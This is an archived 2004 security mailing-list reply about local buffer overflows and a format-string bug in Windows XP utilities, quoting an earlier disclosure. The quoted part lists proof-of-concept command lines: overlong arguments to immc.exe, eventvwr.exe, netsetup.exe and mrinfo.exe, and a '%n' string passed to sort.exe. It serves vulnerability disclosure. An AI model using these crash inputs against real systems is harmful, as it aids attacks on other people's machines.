Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Windows XP multiple local buffer overflows and format string bugs

Re: Windows XP multiple local buffer overflows and format string bugs

From: Berend-Jan Wever <skylined_at_edup.tudelft.nl>
Date: Mon, 25 Oct 2004 19:52:23 +0200 (CEST)

> Hi guys, little come back after a moving.
>
> I don't remember to have seen these details, sorry if i'm wrong.

You obviously haven't read the lists then:
http://seclists.org/lists/bugtraq/2004/Oct/0045.html
I wrote about windows local BoF and formatstrings a few weeks back and
included a simple command to test for these. Also, I've tried to exploit a
few and it's pretty hard to actually do that for a very simple program
like sort.

Cheers,
SkyLined

>
> AUTHOR
> Komrade
>
> DATE
> 08/10/2004
>
> PRODUCT
> Windows XP
> Tested on Windows XP Service Pack 2, prior versions should have the same
> bugs.
>
> DETAILS
> Here is a list of some Windows XP utilities that are vulnerable to local
> buffer overlows and format string bugs.
> These programming errors, alone, are not security vulnerabilities (you
> need local access and you don't gain more privilege), but they could
> became serious security issues if someone has the possibility to remotely
> start a program with at least a parameter (what happens with the "shell:"
> protocol security issue in the Mozilla browser prior to version 1.7.3,
> that permits to remotely execute a program and pass to it parameters).
>
> These informations have been disclosed to inform you that if a new
> vulnerability will be discovered which allows remote execution of programs
> (passing parameters), all Windows XP operating system will be affected by
> several remote buffer overflows and format string vulnerabilities allowing
> remote code execution.
>
> Buffer Overlow in immc.exe
> POC
> c:\> immc.exe aaaaaaaaaa(285 'a' characters)
>
> Buffer Overlow in eventvwr.exe (UNICODE)
> POC
> c:\> eventvwr.exe aaaaaaaaaa(848 'a' characters)
>
> Buffer Overlow in netsetup.exe
> POC
> c:\> netsetup.exe aaaaaaaaaa(285 'a' characters)
>
> Buffer Overlow in mrinfo.exe
> POC
> c:\> mrinfo.exe aaaaaaaaaa(71 'a' characters)
>
> Format String in sort.exe
> POC
> c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
>
>
> SCAN TOOL
>
> This tool scans your pc, checking if it is affected by one of this local
> bugs.
> This tool only makes a system() call, starting the vulnerable programs
> with the opportune parameters.
>
> http://unsecure.altervista.org/security/xplocalscan.c
>
> Regards,
> Jerome
> -------------null
>
> C est le moment de dynamiser votre boîte mail en découvrant les offres
> CaraMail Premium - http://www.caramailmax.com
>
>
Received on Oct 25 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos